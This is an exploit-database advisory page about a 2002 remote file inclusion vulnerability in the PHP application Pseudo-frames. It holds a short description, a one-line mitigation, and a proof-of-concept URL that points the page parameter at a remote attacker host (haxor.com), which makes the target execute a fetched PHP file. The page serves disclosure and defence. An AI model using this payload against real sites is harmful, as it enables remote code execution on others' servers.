header-logo
Suggest Exploit
vendor:
Pseudo-frames
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include Vulnerability
98
CWE
Product Name: Pseudo-frames
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Pseudo-frames Remote File Include Vulnerability

Pseudo-frames is an application written in PHP and is maintained by Clicky Web. It permits remote file including, allowing a remote attacker to include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software.

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4756/info

Pseudo-frames is an application written in PHP and is maintained by Clicky Web.

Pseudo-frames permit remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software.

http://www.site.com/index.php?page=http://www.haxor.com/file

Navigation

Suggest Exploit

Services By CQR